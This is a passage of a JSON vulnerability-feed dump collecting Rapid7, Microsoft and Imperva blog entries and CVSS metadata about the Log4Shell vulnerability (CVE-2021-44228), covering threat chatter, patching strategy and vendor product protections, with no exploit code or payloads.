of GitHub on the Log4j Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T21:47:30", "id": "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "href": "https://blog.rapid7.com/2022/01/19/security-nation-mike-hanley-of-github-on-the-log4j-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T23:08:05", "description": "\n\nIt's been a long few days as organizations' security teams have worked to map, quantify, and mitigate the immense risk presented by the [Log4Shell vulnerability within Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). As can be imagined, cybercriminals are working overtime as well, as they seek out ways to exploit this vulnerability.\n\n#### Need clarity on detecting and mitigating Log4Shell?\n\n[Sign up for our webinar on Thursday, December 16, 2021](<https://www.rapid7.com/about/events-webcasts/brighttalk/524370/>)\n\n \n\n\nThe Rapid7 Threat Intelligence team is tracking the attacker's-eye view and the related chatter on the clear, deep, and dark web within our [Threat Intelligence platform](<https://www.rapid7.com/products/threat-command/>). Here are 4 observations based on what we've seen at the onset of the identification of CVE-2021-44228.\n\n## 1\\. We see a spike in hacker chatter and security researchers' publications about Log4j.\n\n\n\nIncreased hacker chatter is a key indicator of an emerging threat that security teams must account for. Clearly the spike here is no surprise \u2013 however, it is important to monitor and understand the types and scope of the chatter in order to get a clear picture of what's on the horizon.\n\n## 2\\. Hackers \u2013 specifically from the Russian, Chinese, and Turkish communities \u2013 show interest in the vulnerability and are actively sharing scanners and exploits.\n\n\n\nThe following two screenshots show that bad actors have already developed and shared proof of concepts exploiting the vulnerability in Log4j. They also show the extent to which this vulnerability impacts user communities such as PC gamers, social media users, Apple/iCloud customers, and more.\n\nLog4Shell discussion on a Russian cybercrime forumLog4j discussion on a Turkish cybercrime forum\n\n## 3\\. Code with a proof of concept for the exploit has been published on GitHub.\n\n\n\nThe underground cybercrime community functions like any other business model, but what sets it apart is the spirit with which bad actors share their work for mass consumption. The example above is completely open and free for anyone to access and utilize.\n\n## 4\\. Various scanners were published on GitHub to identify vulnerable systems.\n\nScanners are the cybercriminal's tool of choice for finding specific vulnerabilities in networks communicating via the internet. Using a scanner, any company \u2014 regardless of size \u2014 can be a target.\n\nLog4j Scanner Discussion on RedditA fully automated, accurate, and extensive scanner for finding vulnerable Log4j hosts\n\n## While others look inside, we look outside\n\nThe bottom line is that threat actors are showing great interest in Log4j within underground communities, and they are leveraging these communities to share information and experience regarding exploiting this vulnerability. That emphasizes the need to quickly patch this vulnerability, before multiple cybercriminals put their hands on an exploit and start to utilize it on a large scale.\n\n_[Read more](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) about the Log4Shell vulnerability within Log4j, and what your team can do in response._", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T21:05:17", "type": "rapid7blog", "title": "Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T21:05:17", "id": "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "href": "https://blog.rapid7.com/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T20:18:00", "description": "\n\n[CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) rules everything around us \u2014 or so it seemed, at least, for those breathless days in December 2021 when the full scope of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) was starting to take hold and security teams were strapped for time and resources as they scoured their organizations' environments for vulnerable instances of Apache Log4j. But now that the peak intensity around this vulnerability has waned and we've had a chance to catch our collective breath, where does the effort to patch and remediate stand? What should security teams be focusing on today in the fight against Log4Shell?\n\nOn Wednesday, February 16, Rapid7 experts Bob Rudis, Devin Krugly, and Glenn Thorpe sat down for a webinar on the current state of the Log4j vulnerability. They covered where Log4Shell stands now, what the future might hold, and what organizations should be doing proactively to ensure they're as protected as possible against exploits.\n\n## Laying out the landscape\n\nGlenn Thorpe, Rapid7's Program Manager for Emergent Threat Response, kicked things off with a recap and retrospective of Log4Shell and why it seemingly set fire to the entire internet for a good portion of December. The seriousness of this vulnerability is due to the coming-together of several key factors, including:\n\n * The ability for vulnerable systems to grant an attacker full administrative access\n * The low level of skill required for exploitation \u2014 in many cases, attackers simply have to copy and paste\n * The attack vector's capability to run undetected over an encrypted channel\n * The pervasiveness of the Log4j library, which means vulnerability scanners alone can't act as complete solutions against this threat\n\nPut all this together, and it's no surprise that the volume of exploit attempts leveraging the Log4j vulnerability ramped up throughout December 2021 and has continued to spike periodically throughout January and February 2022. By January 10, ransomware using Log4Shell had been observed, and on January 14, Rapid7's MDR saw [mass Log4j exploits in VMware products](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>).\n\nBut while there's certainly been plenty of Log4j patching done, the picture on that front is far from complete. According to the [latest CISA data](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>) (also [here](<https://docs.google.com/spreadsheets/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit#gid=0>) as a daily-updated spreadsheet), there are still 320 cataloged software products that are known to be affected by vulnerable Log4j as of February 16, 2022 \u2014 and 1,406 still awaiting confirmation from the vendor.\n\n\n\n## Log4j today: A new normal?\n\nSo, where does the effort to put out Log4j fires stand now? Devin Krugly, Rapid7's Practice Advisor for Vulnerability Risk Management, thinks we're in a better spot than we were in December \u2014 but we're by no means out of the woods.\n\n\"We're effectively out of fire-fighting mode,\" said Devin. That means that, at this point, most security teams have identified the affected systems, implemented mitigations, and patched vulnerable versions of Log4j. But because of the complexity of today's software supply chains, there are often heavily nested dependencies within vendor systems \u2014 some of which Log4j may still be implicated in. This means it's essential to have a solid inventory of vendor software products that may be using Log4j and to ensure those instances of the library are updated and patched.\n\n\"Don't lose that momentum,\" Glenn chimed in. \"Don't put that on your post-mortem action list and forget about it.\"\n\nThis imperative is all the more critical because of a recent uptick in Log4Shell activity. Rapid7's Chief Data Scientist Bob Rudis laid out some [activity detected by the Project Heisenberg honeypot fleet](<https://www.rapid7.com/research/project-doppler/>) indicating a revival of Log4j activity in early and mid-February, much of it from new infrastructure and scanning hosts that hadn't been seen before.\n\nAmid this increase in activity, vulnerable instances of Log4j are anything but gone from the internet. In fact, data from [Sonatype](<https://www.sonatype.com/resources/log4j-vulnerability-resource-center>) as of February 16, 2022 indicates 39% of Log4j downloads are _still _versions vulnerable to Log4Shell.\n\n\u201cWe're going to be seeing Log4j attempts on the internet, on the regular, at a low level, forever,\" Bob said. Log4Shell is now in a family with WannaCry and Conficker (yes, that Conficker) \u2014 vulnerabilities that are around indefinitely, and which we'll need to continually monitor for as attackers use them to try to breach our defenses.\n\n## Navigating life with Log4Shell\n\nAdopting a defense-in-depth posture in the \"new normal\" of life with Log4Shell is sure to come with its share of headaches. Luckily, Bob, Devin, and Glenn shared some practical strategies that security teams can adopt to keep their organizations' defenses strong and avoid some common pitfalls.\n\n### Go beyond compensating controls\n\n\"My vendor says they've removed the JNDI class from the JAR file \u2014 does that mean their application is no longer vulnerable to Log4Shell?\" This question came up in a few different forms from our webinar audience. The answer from our panelists was nuanced but crystal-clear: maybe for now, but not forever.\n\nRemoving the JNDI class is a compensating control \u2014 one that provides a quick fix for the vulnerability but doesn't patch the core, underlying problem via a full update. For example, when you do a backup, you might unknowingly reintroduce the JNDI class after removing it \u2014 or, as Devin pointed out, an attacker could chain together a replacement for it.\n\nThese kinds of compensating or mitigating controls have their place in a short-term response, but there's simply no action that can replace the work of upgrading all instances of Log4j to the most up-to-date versions that contain patches for Log4Shell.\n\n\"Mitigate for speed, but not in perpetuity,\" Glenn recommended.\n\n### Find the nooks and crannies\n\nToday's cloud-centric IT environments are increasingly ephemeral and on-demand \u2014 a boost for innovation and speed, but that also means teams can deploy workloads without security teams ever knowing about it. Adopting an \"Always Be Scanning\" mindset, as Bob put it, is essential to ensure vulnerable instances of Log4j aren't introduced into your environment.\n\nContinually scanning your internet-facing components is a good and necessary start \u2014 but the work doesn't end there. As Devin pointed out, finding the nooks and crannies where Log4j might crop up is critical. This includes scouring containers and virtual machines, as well as analyzing application and server logs for malicious JNDI strings. You should also ensure your [security operations center (SOC)](<https://www.rapid7.com/fundamentals/security-operations-center/>) team can quickly and easily identify indicators that your environment is being scanned for reconnaissance into Log4Shell exploit opportunities.\n\n\u201cInvolving the SOC team for alerting purposes, if you haven't already done that, is an absolutely necessity in this case,\" said Devin.\n\n### Get better at vendor management\n\nIt should be clear by now that in a post-Log4j world, organizations must demand the highest possible level of visibility into their software supply chain \u2014 and that means being clear, even tough, with vendors.\n\n\u201cManaging stuff on the internet is hard because organizations are chaotic beings by nature, and you're trying to control the chaos as a security professional,\" said Bob. Setting yourself up success in this context means having the highest level of vulnerability possible. After all, how many other vulnerabilities just as bad as Log4Shell \u2014 or even worse \u2014 might be out there lurking in the corners of your vendors' code?\n\nThe upcoming US government requirements around [Software Bill of Materials (SBOM)](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>) for vendor procurement should go a long way toward raising expectations for software vendors. Start asking vendors if they can produce an SBOM that details remediation and update of any vulnerable instances of Log4j.\n\nThese conversations don't need to be adversarial \u2014 in fact, vendors can be a key resource in the effort to defend against Log4Shell. Especially for smaller organizations or under-resourced security teams, relying on capable third parties can be a smart way to bolster your defenses.\n\n## Only you can secure the software supply chain\n\nOK, maybe that subhead is not literally true \u2014 a secure software supply chain is a community-wide effort, to which we must all hold each other accountable. The cloud-based digital ecosystem we all inhabit, whether we like it or not, is fundamentally interconnected. A pervasive vulnerability like Log4Shell is an unmistakable reminder of that fact.\n\nIt also serves as an opportunity to raise our expectations of ourselves, our organizations, and our partners \u2014 and those choices do start at home, with each security team as they update their applications, continually scan their environments, and demand visibility from their vendors. Those actions really do help create a more secure internet for everyone.\n\nSo while we'll be living with Log4Shell probably forever, it'll be living with us, too. And as scared as you are of the spider, it's even more scared of your boot.\n\n_Want to go more in-depth? Check out the full replay of our webinar, \"[Log4Shell Two Months Later: Lessons and Insights for Protectors](<https://information.rapid7.com/Log4Shell-Two-Months-Later.html>).\"_\n\n**Quick resources:**\n\nBob, Devin, and Glenn mentioned a wealth of handy links in their discussion. Here are those resources for quick, easy reference.\n\n * [CISA's Log4j Affected Database spreadsheet](<https://docs.google.com/spreadsheets/u/1/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit?usp=drive_web&ouid=112199732671088168182>)\n * [CISA's Log4j Affected Database table](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>)\n * [CISA Known Exploited Vulnerabilities (KEV) catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)\n * [Project Doppler](<https://www.rapid7.com/research/project-doppler/>)\n * [ShadowServer](<https://www.shadowserver.org/>)\n * [SBOM information from the US government](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>)\n\n_**Additional reading:**_\n\n * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Active Exploitation of VMware Horizon Servers](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>)_\n * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_\n * _[The Everyperson\u2019s Guide to Log4Shell (CVE-2021-44228)](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T18:00:00", "type": "rapid7blog", "title": "Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T18:00:00", "id": "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "href": "https://blog.rapid7.com/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2021-12-18T19:10:35", "description": "Published on: 2021 Dec 11, updated 2021 Dec 18. SUMMARY Microsoft continues our analysis of the remote code execution vulnerabilities related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. Currently, Microsoft is not aware of any impact, outside of the initial disclosure involving Minecraft: Java Edition, to the \u2026\n\n[ Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2 Read More \u00bb](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:28:18", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T05:28:18", "id": "MSRC:543F3A129A47F4B14FB170389908717B", "href": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T15:58:15", "description": "\u672c\u30d6\u30ed\u30b0\u306f\u3001Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2 \u306e\u6284\u8a33\u7248\u3067\u3059\u3002\u6700\u65b0\u306e\u60c5\u5831\u306f\u3001\u5143\u8a18\u4e8b\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T08:00:00", "type": "msrc", "title": "CVE-2021-44228 Apache Log4j 2 \u306b\u5bfe\u3059\u308b\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8\u306e\u5bfe\u5fdc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T08:00:00", "id": "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "href": "/blog/2021/12/microsofts-response-to-cve-2021-44228-apache-log4j2-jp/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2022-01-13T15:31:17", "description": "We have all heard the saying, \u201cearly detection is critical.\u201d This is true in most aspects of our daily lives; in everything from medical diagnosis, automobile issues, a leaky roof, credit card fraud, etc. It should come as no surprise that this is especially true in the context of [data security breaches](<https://www.imperva.com/solutions/safeguard-sensitive-and-personal-data/>) as well.\n\nFor many years, the cyber security industry has been rallying around the concept of preventing data breaches, and why not? To be sure, this is a reasonable goal for a cyber security team to aspire to achieve. In their effort, cyber security teams set up perimeter defenses, restrict data access, patch vulnerabilities, apply sensors to data movement sensors, encrypt data, etc. - and these are essential things to do. In the real world, however, these teams face the ongoing threats of [zero-day vulnerabilities](<https://www.imperva.com/learn/application-security/zero-day-exploit/>), [phishing attacks](<https://www.imperva.com/learn/application-security/phishing-attack-scam/>), stolen credentials, compromised laptops, poor application design, and a hundred other vectors designed specifically to stop them from achieving their goal. These ongoing threats are dynamic and constant. In a split second, they can render useless the manifold defenses that cyber security teams worked so hard to deploy to secure their data. It\u2019s time for a new mindset around protecting data.\n\n**Early detection: Not just for earthquakes and heart attacks anymore.**\n\nThe aforementioned threats to data security are not new. The [Open Web Application Security Project](<https://www.imperva.com/learn/application-security/owasp-top-10/>) (OWASP), a non-profit organization dedicated to helping website owners and security experts protect web applications from [cyber attacks](<https://www.imperva.com/learn/application-security/cyber-attack/>) has been around since 2001. Given that history, you&#x27;d think the statement \u201cit\u2019s time for a new mindset around protecting data\u201d would be a foregone conclusion at this point; but, it&#x27;s not. In some respects, the evolution of data security is akin to the evolution of warfare. As I work with organizations on bolstering their cyber security posture, I am often reminded of Wellington\u2019s comment about Napoleon\u2019s defeat at the 1815 Battle of Waterloo, \u201cThey came on in the same old way and we defeated them in the same old way.\u201d I suspect that had there been hackers in those days, they\u2019d have echoed Wellington\u2019s sentiments. What most organizations need is not \u201cthe same, just more of it\u201d but a new mindset about how we consider gaps and weak spots in data protection today. It\u2019s really time to flip the traditional security paradigm on its head with a revised approach to protecting data, then apps, then endpoints, then the perimeter. Or more simply, a strategy in which protecting data itself is the priority. \n\n\n**Waterloo, 1815. Napoleon did not recognize the need for a new strategic paradigm.**\n\n## What\u2019s the problem?\n\nThe threat landscape changes every day. On December 1, \u201c[CVE-2021-44228](<https://www.imperva.com/blog/log4shell-log4j-remote-code-execution-the-covid-of-the-internet/>)\u201d may well have been the hull classification for a new US Navy ship for all we knew. When you consider new threat vectors every day, the notion of breach prevention almost seems like an outdated philosophy. An effective approach today to protecting sensitive data must be much more agile and dynamic. Look at the billions of dollars that enterprises spend to erect fortresses around their data only to be undermined almost daily by a privileged user clicking on a link in an unsolicited email or a missing patch on a router. The reality is that we no longer have black and white boundaries to protect. Instead, we must settle for a more practical and modest goal of minimizing the impact of breaches when they occur - because they will occur!\n\n## Breach detection at the database level is key\n\nOur new paradigm must compel us to focus on early detection of a breach where it matters most: at the database level. Routers, FWs, and laptops are not the hackers\u2019 intended targets. In fact, cybercriminals are not even after your money, directly. Personally identifiable data is far more valuable. As I said, tactics such as protecting the perimeter and deploying web application defenses are important; but at the end of the day, these are all merely entry points from which a cyber attacker can pivot to find and steal the real crown jewels, the concentrated sensitive personal data you keep in databases across your entire architecture. Make no mistake: the goal of most cyber attackers is to identify and exfiltrate customer, patient, payment card or intellectual property information from your data sources because those are precisely the assets that have tangible value in the shadowy depths of the internet. For cyber security practitioners, the process is challenging but very straightforward. Gain visibility into 100% of your data estate and use reliable, automated analytics tools to get a handle on what is normal so you can quickly identify suspicious behavior and orchestrate actions to stop it.\n\n## The negative consequences of doing nothing\n\nThe impact of a breach that goes undetected and results in the compromise and loss of sensitive customer data is far-ranging. The most common impact is financial losses. The longer the breach is undetected, the higher the loss potential. These losses range from regulatory fines, identity protection offerings, reputation/confidence damage resulting in lost customers, and now class action lawsuits. Lawsuits that could have been avoided if there was an attempt at \u201cadequate\u201d or \u201creasonable\u201d controls around data which could have reduced the time to detection and minimized the impact of data loss. Of course, there are always secondary impacts in the form of negative brand reputation, high turnover from exhausted security/IT teams, poor corporate morale, etc. The bottom line: the longer you stick to the \u201csame old, same old\u201d and succumb to budget and technology inertia year after year, the more damaging these attacks will be and the more likely they\u2019ll be to pose an existential threat to your enterprise going forward.\n\n**A typical result of years of budget and technology inertia. Spoiler alert: you&#x27;re the zebra.**\n\nIn this series of blogs, we\u2019ll familiarize you with what a typical attack scenario looks like in today\u2019s threat landscape so you\u2019ll know it when you see it. We\u2019ll explain the core functionalities you need to have today from your database security solution and provide tips and insights into how to build on your existing security posture and put your new solution into practice. Watch this space\u2026\n\nThe post [Analytics Are Essential for Effective Database Security](<https://www.imperva.com/blog/analytics-are-essential-for-effective-database-security/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T15:23:02", "type": "impervablog", "title": "Analytics Are Essential for Effective Database Security", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-13T15:23:02", "id": "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "href": "https://www.imperva.com/blog/analytics-are-essential-for-effective-database-security/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T06:45:07", "description": "Since it was disclosed on Friday, December 11, I have spoken with many customers about CVE-2021-44228 and the ways Imperva is working to ensure that [they are protected](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>). Countless others have contacted us with questions about ways to mitigate the impact from the Log4j vulnerability. \n\nIn the spirit of transparency and information sharing, we\u2019ve aggregated below the most common questions we\u2019ve received to date and the answers we\u2019ve been providing to assist our customers through this time. \n\nThis is a complex and evolving situation -- one that takes partnership, diligence and patience. The global Imperva team is dedicated to helping you. We will continue to keep you informed with additional information as it becomes available.\n\n**Q: What is the state of Imperva\u2019s Application Security product posture?**\n\nA: Imperva Cloud Web Application Firewall (WAF), Imperva WAF Gateway and Imperva RASP were not affected by CVE-2021-44228. All Application Security products have the ability to detect and block exploits targeting the CVE.\n\n**Q: Is Imperva implementing rule changes for the Imperva Cloud Web Application Firewall (WAF) to combat Apache Log4j2?**\n\nA: Absolutely. We\u2019ve deployed a dozen security rule updates since CVE-2021-44228 was disclosed to help our customers mitigate new attack variants.\n\nWe saw initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC. As said in our initial blog post, our existing security rules put in place for Imperva Cloud WAF customers mitigated these early CVE attacks without requiring any patching. \n\nImperva Threat Research detected new CVE-specific attack variants, resulting in the creation of additional security rules on December 10, 2021 at 5:41 UTC. These updates were tested and deployed to the Imperva Global Network and ThreatRadar Feed on December 10, 2021 at 11:44 UTC. \n\nOver the last few days, we\u2019ve detected new variants and responded by creating and deploying updated rules. Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules based on new attack variants. \n\n**Q: What rule changes are being implemented for Imperva WAF Gateway (GW) to combat Apache Log4j2?**\n\nA: After monitoring initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC, Imperva Threat Research immediately began creating additional security rules for Imperva WAF GW. \n\nManual rules were supplied to Imperva WAF GW customers to mitigate CVE-specific attacks. An Imperva Documentation [knowledge base article](<https://docs.imperva.com/howto/9111b8a5>) (login required) contains the signature information for creating the specific rule. This document was updated as of December 13, 2021 15:30 UTC.\n\nCustomers that have Threat Radar Emergency Feed Services received an initial update with these CVE-specific rules on December 10, 2021 11:30 UTC. As new variants were discovered, updated rules were published to Threat Radar on December 11, 2021 10:30 UTC, December 11, 2021 3:30 UTC and December 13, 2021 12:20 UTC.\n\nCustomers using Imperva Application Defense Center (ADC) were able to receive an update on December 13, 2021 at 10:00 UTC. ADC content can be updated manually or automatically. For information about configuring ADC, please visit the [ADC Update Guide](<https://docs.imperva.com/bundle/v12.6-administration-guide/page/6874.htm>).\n\nJust like for Cloud WAF, Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules for WAF GW based on new attack variants. \n\n**Q: For both Imperva Cloud WAF and Imperva WAF GW, where can I see if I am getting hit by traffic related to this Remote Code Execution (RCE) exploit? Is there a dashboard to help me?**\n\nA: Imperva Cloud WAF customers can see the CVE\u2019s activity in Imperva Attack Analytics (screenshot below).\n\nIncidents in Imperva Attack Analytics can be filtered by this specific CVE (screenshot below).\n\nOnce Imperva WAF GW customers establish the appropriate signatures (manually, via Threat Radar or via ADC), they will be able to see alerts and block events within the MX or within their SIEM, where log events are ingested. The default logging templates should include signature names and events like \u201cCVE-2021-44228: Zero day RCE in Log4j2 via LDAP JNDI parser\u201d.\n\n**Q: If I have Imperva RASP deployed across my Java applications, am I protected?**\n\nA: Yes. Given the nature of how Imperva RASP works, RCEs caused by CVE-2021-44228 were stopped without requiring any code changes or policy updates (additional details below). Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected if Imperva RASP is currently deployed.\n\n**Q: What types of vulnerabilities does Imperva RASP protect out of the box?**\n\nA: Imperva RASP is complementary to Imperva WAF. While the latter keeps bad traffic out, RASP mitigates the risk posed by unknown exploits in first or third-party code/dependencies. By being embedded in the application, RASP has direct visibility into attacks relating to a RCE, which is an advantage for detecting and stopping a specific class of attack.\n\n**Q: Where can I learn more about Imperva RASP? **\n\nA: Imperva RASP is an industry-leading product that is designed to protect against zero-days and the OWASP Top 10 application security threats, injections and weaknesses. Learn more [here](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>).\n\n**Q: Is the Log4j vulnerability impacting any of Imperva&#x27;s corporate systems (including customer/partner portals and FTP)?**\n\nA: No. Imperva worked quickly to update all vulnerable systems immediately after becoming aware of 